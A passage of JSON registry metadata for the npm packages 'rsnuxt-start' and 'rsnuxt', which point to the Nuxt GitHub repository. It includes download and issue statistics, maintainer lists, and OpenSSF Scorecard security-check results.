patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32304464,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-26T09:34:17.070Z","status":"ssl_error","status_checked_at":"2026-04-26T09:34:00.993Z","response_time":129,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:00.842Z","dependent_packages_count":0,"downloads":561,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/rsnuxt-start","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/rsnuxt-start","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/rsnuxt-start","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/rsnuxt-start/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt-start/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt-start/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt-start/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt-start/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt-start/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt-start/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:42:15.972Z","updated_at":"2025-02-11T09:42:15.972Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11343189,"name":"rsnuxt","ecosystem":"npm","description":"A minimalistic framework for server-rendered Vue.js applications (inspired by Next.js)","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":["nuxt","nuxt.js","nuxtjs","ssr","vue","vue isomorphic","vue server side","vue ssr","vue universal","vue versatile","vue.js","vuejs"],"namespace":null,"versions_count":36,"first_release_published_at":"2025-02-11T09:15:01.269Z","latest_release_published_at":"2026-03-30T06:58:38.744Z","latest_release_number":"0.5.13","last_synced_at":"2026-05-11T01:23:05.581Z","created_at":"2025-02-11T09:37:01.442Z","updated_at":"2026-05-11T01:23:05.582Z","registry_url":"https://www.npmjs.com/package/rsnuxt","install_command":"npm install rsnuxt","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"0.2.2-alpha.1":"0.2.2-alpha.1","0.2.2-alpha.2":"0.2.2-alpha.2","latest":"0.5.13"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch 